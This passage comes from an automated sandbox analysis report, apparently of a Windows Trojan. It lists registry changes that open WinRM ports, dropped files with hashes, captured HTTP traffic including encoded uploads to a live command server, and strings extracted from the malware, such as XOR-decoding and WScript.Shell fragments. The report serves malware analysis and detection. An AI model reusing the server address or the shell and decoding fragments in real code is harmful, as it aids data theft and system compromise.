"Seed" = "1B 21 C1 1A 36 D0 6C F5 00 3C DB 6D 66 6B 6C 16"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process wsmanhttpconfig.exe:1932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE 43 7F 13 C4 2E C4 54 11 C6 A3 C8 84 72 BC 82"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Event Forwarding Plugin]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :47001/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"80:TCP" = "80:TCP:*:Enabled:Windows Remote Management - Compatibility Mode (HTTP-In)"

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"https:// :5986/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"5985:TCP" = "5985:TCP:*:Enabled:Windows Remote Management"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"UpdatedConfig" = "5404E53D-7E8A-4A45-BDDA-003E6978AD0D"

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :5985/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\WMI Provider]
"ConfigXML" = ""

The process wsmanhttpconfig.exe:2476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E E5 4B DA 88 89 66 C2 0C BE B3 59 94 DA 14 26"

Dropped PE files

MD5 File path
85d7ab466d0577c49fc9879107ec7ef5 c:\95cb07fb380b69f02f8492ce2d5a\compiledcomposition.microsoft.powershell.gpowershell.dll
2f7fe3a781ba8c0a67c775f20e3e9f70 c:\95cb07fb380b69f02f8492ce2d5a\microsoft.backgroundintelligenttransfer.management.dll
173d3dd1425a8e33fa1d4ed71067a3a2 c:\95cb07fb380b69f02f8492ce2d5a\microsoft.backgroundintelligenttransfer.management.interop.dll
75c183e262bd4400eb0f20349f6ef383 c:\95cb07fb380b69f02f8492ce2d5a\microsoft.backgroundintelligenttransfer.management.resources.dll
08e87e8abf7b41b28663dce817ce0ab6 c:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.diagnostics.dll
4e2482e69baaf3a5b13db8101c063ebf c:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.diagnostics.resources.dll
f3ac3f844f90380aab2b4c0836c4288f c:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.management.dll
b87e087fc013225e2aa1cb60c080647d c:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.management.resources.dll
dfeb401cc051e5da721c584ff6a90f88 c:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.utility.dll
1ce73fb3f88c716cfc3fd550547d2b35 c:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.utility.resources.dll
3991b7fa452a9c9c291c06365a236792 c:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.consolehost.dll
36ff641f37918f2cca98e7f407ac4d75 c:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.consolehost.resources.dll
208fa9d0ebe2ceb9616042772e96598e c:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.editor.dll
37bed865557084dd9988350ab1675e0b c:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.editor.resources.dll
d4eefccdc3de6ced901535fa4153c491 c:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.gpowershell.dll
108500a98b9a2f66823e7615398fc87b c:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.gpowershell.resources.dll
3eab4dbdc290edc4d53fe77f1fdb9e59 c:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.graphicalhost.dll
5a69fb5d686f863e0e13268d671ef16d c:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.graphicalhost.resources.dll
53a9d748ef09920a0d06da2583c298ad c:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.security.dll
c7a0d1321a67a2afd330c5fbe79befd1 c:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.security.resources.dll
1a4e900c2fe3cd31d10107670d184fe6 c:\95cb07fb380b69f02f8492ce2d5a\microsoft.wsman.management.dll
6372ea7d2aced7185183cf3fcdd3577b c:\95cb07fb380b69f02f8492ce2d5a\microsoft.wsman.management.resources.dll
f7da27672d2e4c21a1f996ee31de0dbf c:\95cb07fb380b69f02f8492ce2d5a\microsoft.wsman.runtime.dll
df4217ddb34a0b73dc7aac7829371c0c c:\95cb07fb380b69f02f8492ce2d5a\powershell.exe
fe7bc06af17d7cd8fb8e6d72d72453b8 c:\95cb07fb380b69f02f8492ce2d5a\powershell.exe.mui
36b6f71b6d7d280302b348145db05a9f c:\95cb07fb380b69f02f8492ce2d5a\powershell_ise.exe
cb3a534127f37d0fa1f556dbb76575d3 c:\95cb07fb380b69f02f8492ce2d5a\powershell_ise.resources.dll
fc9a05096522bb6d7ceda62ea1707420 c:\95cb07fb380b69f02f8492ce2d5a\pscustomsetuputil.exe
95b7f12a557dedac5e4a1e9afa5e73ab c:\95cb07fb380b69f02f8492ce2d5a\pspluginwkr.dll
35efd8cd6549a4339cb2a28c8cfd6598 c:\95cb07fb380b69f02f8492ce2d5a\pssetupnativeutils.exe
a94243b797377ba03b63fc716c13bcf5 c:\95cb07fb380b69f02f8492ce2d5a\pwrshmsg.dll
8c386819bf5b39d7a4b274d0b55f87a5 c:\95cb07fb380b69f02f8492ce2d5a\pwrshplugin.dll
7943a80f1a6fd37969aacd411b511f91 c:\95cb07fb380b69f02f8492ce2d5a\pwrshsip.dll
066f7fcca265d01a5b7eaf41ade789b1 c:\95cb07fb380b69f02f8492ce2d5a\spmsg.dll
a39df582ca051afc8811fbd00db12f10 c:\95cb07fb380b69f02f8492ce2d5a\spuninst.exe
1b2c60a6d6c3833b413943862b2bfed8 c:\95cb07fb380b69f02f8492ce2d5a\spupdsvc.exe
4d8ab4fad244f7985d8c59d456e026d7 c:\95cb07fb380b69f02f8492ce2d5a\system.management.automation.dll
2286b57ecc2d32d24049c51989084268 c:\95cb07fb380b69f02f8492ce2d5a\system.management.automation.resources.dll
5d6d17b645fa91fce7f0712f3da4f297 c:\95cb07fb380b69f02f8492ce2d5a\update\spcustom.dll
50914702cb6c72275018643c557ef8c5 c:\95cb07fb380b69f02f8492ce2d5a\update\update.exe
9a055da2f2819f155c33d47cd67a7c00 c:\95cb07fb380b69f02f8492ce2d5a\update\updspapi.dll
84e025b1259c66315f4d45a6caecacc9 c:\95cb07fb380b69f02f8492ce2d5a\wevtfwd.dll
cd17705af8e53a82facb545a213ab09c c:\95cb07fb380b69f02f8492ce2d5a\winrmprov.dll
afdf7654880ce23005014895b129d948 c:\95cb07fb380b69f02f8492ce2d5a\winrs.exe
3e9b11880ae4a8ff399ce0573c82655b c:\95cb07fb380b69f02f8492ce2d5a\winrscmd.dll
62021e3e6ba13d72cf5cc1047cfac991 c:\95cb07fb380b69f02f8492ce2d5a\winrshost.exe
b84092e52861a026fc83bcede4a7abfa c:\95cb07fb380b69f02f8492ce2d5a\winrsmgr.dll
35bc7c49676e5ab617ef94dc9854a6f1 c:\95cb07fb380b69f02f8492ce2d5a\winrssrv.dll
972916faac89c4aa978952b30f478e81 c:\95cb07fb380b69f02f8492ce2d5a\wsmanhttpconfig.exe
2c9c9ae86eb2b4e78c8e09deb7509a63 c:\95cb07fb380b69f02f8492ce2d5a\wsmauto.dll
23ce21efc2ae95700f2b1f9582fe3867 c:\95cb07fb380b69f02f8492ce2d5a\wsmplpxy.dll
faa2fcc6853e5123e05dccc5919657e2 c:\95cb07fb380b69f02f8492ce2d5a\wsmprovhost.exe
67146d3606be1111a39f0fd61f47e9b6 c:\95cb07fb380b69f02f8492ce2d5a\wsmres.dll
18f347402da544a780949b8fdf83351b c:\95cb07fb380b69f02f8492ce2d5a\wsmsvc.dll
296e6992278fea7140d88b603e6c2a8a c:\95cb07fb380b69f02f8492ce2d5a\wsmwmipl.dll
c9b940bc8e2cbfef867ce8062f91db6e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\idyja\idyja.exe
9859a26d5e72bbb0685af813b409d99d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe
a39df582ca051afc8811fbd00db12f10 c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\spuninst.exe
9a055da2f2819f155c33d47cd67a7c00 c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\updspapi.dll
2f7fe3a781ba8c0a67c775f20e3e9f70 c:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.BackgroundIntelligentTransfer.Management.dll
75c183e262bd4400eb0f20349f6ef383 c:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll
08e87e8abf7b41b28663dce817ce0ab6 c:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Diagnostics.dll
4e2482e69baaf3a5b13db8101c063ebf c:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Diagnostics.resources.dll
f3ac3f844f90380aab2b4c0836c4288f c:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Management.dll
b87e087fc013225e2aa1cb60c080647d c:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Management.resources.dll
dfeb401cc051e5da721c584ff6a90f88 c:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Utility.dll
1ce73fb3f88c716cfc3fd550547d2b35 c:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Utility.resources.dll
3991b7fa452a9c9c291c06365a236792 c:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll
36ff641f37918f2cca98e7f407ac4d75 c:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.resources.dll
53a9d748ef09920a0d06da2583c298ad c:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Security.dll
c7a0d1321a67a2afd330c5fbe79befd1 c:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Security.resources.dll
6372ea7d2aced7185183cf3fcdd3577b c:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.WSMan.Management.Resources.dll
1a4e900c2fe3cd31d10107670d184fe6 c:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.WSMan.Management.dll
f7da27672d2e4c21a1f996ee31de0dbf c:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.WSMan.Runtime.dll
4d8ab4fad244f7985d8c59d456e026d7 c:\WINDOWS\system32\WindowsPowerShell\v1.0\System.Management.Automation.dll
2286b57ecc2d32d24049c51989084268 c:\WINDOWS\system32\WindowsPowerShell\v1.0\System.Management.Automation.resources.dll
df4217ddb34a0b73dc7aac7829371c0c c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
fe7bc06af17d7cd8fb8e6d72d72453b8 c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe.mui
95b7f12a557dedac5e4a1e9afa5e73ab c:\WINDOWS\system32\WindowsPowerShell\v1.0\pspluginwkr.dll
a94243b797377ba03b63fc716c13bcf5 c:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshmsg.dll
7943a80f1a6fd37969aacd411b511f91 c:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshsip.dll
2c9c9ae86eb2b4e78c8e09deb7509a63 c:\WINDOWS\system32\WsmAuto.dll
67146d3606be1111a39f0fd61f47e9b6 c:\WINDOWS\system32\WsmRes.dll
18f347402da544a780949b8fdf83351b c:\WINDOWS\system32\WsmSvc.dll
296e6992278fea7140d88b603e6c2a8a c:\WINDOWS\system32\WsmWmiPl.dll
84e025b1259c66315f4d45a6caecacc9 c:\WINDOWS\system32\wevtfwd.dll
cd17705af8e53a82facb545a213ab09c c:\WINDOWS\system32\winrmprov.dll
afdf7654880ce23005014895b129d948 c:\WINDOWS\system32\winrs.exe
3e9b11880ae4a8ff399ce0573c82655b c:\WINDOWS\system32\winrscmd.dll
62021e3e6ba13d72cf5cc1047cfac991 c:\WINDOWS\system32\winrshost.exe
b84092e52861a026fc83bcede4a7abfa c:\WINDOWS\system32\winrsmgr.dll
35bc7c49676e5ab617ef94dc9854a6f1 c:\WINDOWS\system32\winrssrv.dll
972916faac89c4aa978952b30f478e81 c:\WINDOWS\system32\wsmanhttpconfig.exe
23ce21efc2ae95700f2b1f9582fe3867 c:\WINDOWS\system32\wsmplpxy.dll
faa2fcc6853e5123e05dccc5919657e2 c:\WINDOWS\system32\wsmprovhost.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 24771 28672 4.10867 629b5b3d630bf33b0fbc95752e350ea7
.rdata 32768 11819 12288 2.93187 f1f77ea729a6a576c2f397dab86ffccc
.data 45056 4811 8192 2.92036 4d06792bdde02c5ee7743f9d56449e6b
.rsrc 53248 245760 245760 5.50102 348d7bbcbeca823fca723a90d7ebeba3

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://b14-mini.ru/upload.php 109.70.26.37
hxxp://microsoft.com/ 23.96.52.53
hxxp://e10088.dspb.akamaiedge.net/
hxxp://e10088.dspb.akamaiedge.net/uk-ua/
hxxp://e3673.dspg.akamaiedge.net/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe
hxxp://download.microsoft.com/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe 84.53.167.128
hxxp://www.microsoft.com/ 184.86.56.154
hxxp://www.microsoft.com/uk-ua/ 184.86.56.154


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

SURICATA STREAM ESTABLISHED packet out of window
SURICATA STREAM Packet with invalid ack
SURICATA STREAM ESTABLISHED invalid ack

Traffic

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.microsoft.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: MC1=V=3&GUID=489b59b88cff45798f407a73595398d1


HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: hXXp://VVV.microsoft.com/uk-ua/
Date: Sat, 05 Dec 2015 02:34:47 GMT
Connection: keep-alive
X-CCC: SE
X-CID: 2
....


GET /uk-ua/ HTTP/1.1


User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.microsoft.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: MC1=V=3&GUID=489b59b88cff45798f407a73595398d1


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/8.5
CorrelationVector: feX1hbJk9E tNufX.1.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
Access-Control-Allow-Credentials: true
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Frame-Options: SAMEORIGIN
Content-Length: 81287
Date: Sat, 05 Dec 2015 02:34:47 GMT
Connection: keep-alive
Set-Cookie: MS-CV=feX1hbJk9E tNufX.1; domain=.microsoft.com; expires=Sun, 06-Dec-2015 02:34:47 GMT; path=/
Set-Cookie: MS-CV=feX1hbJk9E tNufX.2; domain=.microsoft.com; expires=Sun, 06-Dec-2015 02:34:47 GMT; path=/
X-CCC: SE
X-CID: 2
...<!DOCTYPE html ><html xmlns:mscom="hXXp://schemas.microsof
t.com/CMSvNext" xmlns:md="hXXp://schemas.microsoft.com/mscom-data" lan
g="uk" xmlns="hXXp://VVV.w3.org/1999/xhtml"><head><meta ht
tp-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="ut
f-8" /><meta name="viewport" content="width=device-width, initia
l-scale=1.0" /><link rel="shortcut icon" href="//VVV.microsoft.c
om/favicon.ico?v2" /><script type="text/javascript" src="hXXp://
ajax.aspnetcdn.com/ajax/jQuery/jquery-1.7.2.min.js"> ..           /
/ Third party scripts and code linked to or referenced from this websi
te are licensed to you by the parties that own such code, not by Micro
soft. See ASP.NET Ajax CDN Terms of Use - hXXp://VVV.asp.net/ajaxlibra
ry/CDN.ashx...       </script><script type="text/javascript" 
language="javascript">/*<![CDATA[*/if($(document).bind("mobilein
it",function(){$.mobile.autoInitializePage=!1}),navigator.userAgent.ma
tch(/IEMobile\/10\.0/)){var msViewportStyle=document.createElement("st
yle");msViewportStyle.appendChild(document.createTextNode("@-ms-viewpo
rt{width:auto!important}")),document.getElementsByTagName("head")[0].a
ppendChild(msViewportStyle)}/*]]>*/</script><script type="
text/javascript" src="hXXp://ajax.aspnetcdn.com/ajax/jquery.mobile/1.3
.2/jquery.mobile-1.3.2.min.js"></script><script type="text
/javascript" src="hXXp://i.s-microsoft.com/library/svy/broker.js">&
lt;/script><script type="text/javascript" src="hXXp://c.webt
<<< skipped >>>


POST /upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: b14-mini.ru
Content-Length: 248
Cache-Control: no-cache

RfNdyd6dbJnEasEi637v9XV0Ht4Ts1AGe84E zdibtvaNNPF0Ux6n3sjXY6AcbWY1d12EahxkNnbbEKbMk2JKVdKPqh3vPyG/y4Hxbn1el7oW5vO6RMwordMf/3Jae5ysqFOtmRjqM7JPWpSzmuMJxpQ9g/gpqd0fLDQyUgcI6anrbjHFdkdcVdX7LgJYR dogryM kxWdCwDxnBv w HE9ee2QoUnh13xC5o6rudrD/i1LoasZ98w==
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Dec 2015 02:34:45 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: DENY
577..<!DOCTYPE html>.<html>.    <head>.        <m
eta charset="utf-8">..        <style type="text/css">..      
      html, body, #partner, iframe {..                height:100%;..  
              width:100%;..                margin:0;..                
padding:0;..                border:0;..                outline:0;..   
             font-size:100%;..                vertical-align:baseline;
..                background:transparent;..            }..            
body {..                overflow:hidden;..            }..        </
style>..        <meta content="NOW" name="expires">..        
<meta content="index, follow, all" name="GOOGLEBOT">..        &l
t;meta content="index, follow, all" name="robots">..        <!--
 Following Meta-Tag fixes scaling-issues on mobile devices -->..   
     <meta content="width=device-width; initial-scale=1.0; maximum-
scale=1.0; user-scalable=0;" name="viewport">..    </head>.. 
   <body>..        <div id="partner"></div>..       
 <script type="text/javascript">..            document.write(.. 
                   '<script type="text/javascript" language="JavaSc
ript"'..                              'src="//sedoparking.com/frmpark/
'..                              window.location.host   '/'..         
                     'dealrucenter'..                              '/p
ark.js">'..                      '<\/script>'..            );
..        </script>..    </body>..</html>...0..
<<< skipped >>>


GET /download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: download.microsoft.com
Cache-Control: no-cache
Cookie: MC1=V=3&GUID=489b59b88cff45798f407a73595398d1; MS-CV=feX1hbJk9E tNufX.2


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 09 Oct 2009 23:52:17 GMT
Accept-Ranges: bytes
ETag: "6d3979883b49ca1:0"
Server: Microsoft-IIS/8.5
Content-Disposition: attachment
Content-Length: 6156064
Date: Sat, 05 Dec 2015 02:34:51 GMT
Connection: close
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........#pA.B...B..
[email protected]............
..............PE..L....jkG.............................c... ..........
. ................................^.......... ........................
..............x.............]. ........... "..........................
.....&..@............ ...............................text........ ....
.................. ..`[email protected]...
x........H].................@..@......................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................l...V...:...".............
..................|...................................(...r...d...T...
....*...........P...j...................<...................\......
.................................>...L...^...n.....................
......................2...L.......h...p...............................
........(...>...L...`...v...................................N...>
;...,...................d.............................................
..............z...,...<...J...\...|.......N...Z...d...n...@....
<<< skipped >>>


POST /upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: b14-mini.ru
Content-Length: 236
Cache-Control: no-cache

EfZZw4jJYr6ypwQi1bIU6HCN7f4E/9Wyoh8aKIoEFv hBB m50i5X7he3n7 3/GzXIS66xedfYeVG3zIWXv39d2H0KbDtzvU9bXAomnfXTamqzaFIlPXKNq9Oa4kgiAISTmiyNgLyW7qonrCoN4SqzJYSjUMDE9O1zZjGDUoTR/6oJbnJN9BDE891Fg3l2punVaIQAMc0AlerC4wO/Gc8jIDeqMy9Fp2jusIqOQHJA==
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Dec 2015 02:34:45 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: DENY
577..<!DOCTYPE html>.<html>.    <head>.        <m
eta charset="utf-8">..        <style type="text/css">..      
      html, body, #partner, iframe {..                height:100%;..  
              width:100%;..                margin:0;..                
padding:0;..                border:0;..                outline:0;..   
             font-size:100%;..                vertical-align:baseline;
..                background:transparent;..            }..            
body {..                overflow:hidden;..            }..        </
style>..        <meta content="NOW" name="expires">..        
<meta content="index, follow, all" name="GOOGLEBOT">..        &l
t;meta content="index, follow, all" name="robots">..        <!--
 Following Meta-Tag fixes scaling-issues on mobile devices -->..   
     <meta content="width=device-width; initial-scale=1.0; maximum-
scale=1.0; user-scalable=0;" name="viewport">..    </head>.. 
   <body>..        <div id="partner"></div>..       
 <script type="text/javascript">..            document.write(.. 
                   '<script type="text/javascript" language="JavaSc
ript"'..                              'src="//sedoparking.com/frmpark/
'..                              window.location.host   '/'..         
                     'dealrucenter'..                              '/p
ark.js">'..                      '<\/script>'..            );
..        </script>..    </body>..</html>...0..
<<< skipped >>>


GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: microsoft.com
Cache-Control: no-cache
Cookie: MC1=V=3&GUID=489b59b88cff45798f407a73595398d1


HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.microsoft.com/
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sat, 05 Dec 2015 02:34:46 GMT
Content-Length: 148
<head><title>Document Moved</title></head>.<
;body><h1>Object Moved</h1>This document may be found &
lt;a HREF="hXXp://VVV.microsoft.com/">here</a></body>HT
TP/1.1 301 Moved Permanently..Content-Type: text/html; charset=UTF-8..
Location: hXXp://VVV.microsoft.com/..Server: Microsoft-IIS/8.5..X-Powe
red-By: ASP.NET..Date: Sat, 05 Dec 2015 02:34:46 GMT..Content-Length: 
148..<head><title>Document Moved</title></head>
;.<body><h1>Object Moved</h1>This document may be fo
und <a HREF="hXXp://VVV.microsoft.com/">here</a></body&
gt;..

The Trojan connects to the servers at the folowing location(s):

svchost.exe_152:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
PSAPI.dll
setcpu:
:setcpu
HTTP/1.1
.length;
 =String.fromCharCode(parseInt(
.substr(
,2),16));
 =String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
wininet.dll
user32.dll
ntdll.dll
psapi.dll
"svchost.exe"
svchost.exe
ole32.dll
Kernel32.dll
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
hXXp://
0123456789
Mozilla
?456789:;<=
!"#$%&'()* ,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegCreateKeyW
RegCreateKeyA
GetCPInfo
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
HttpSendRequestA
HttpOpenRequestA
atl.dll
wsock32.dll
shell32.dll
ShellExecuteExW
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
winmm.dll
urlmon.dll
UrlMkSetSessionOption
<%<*<;<@<
:!:%:):-:1:
?:???_?}?
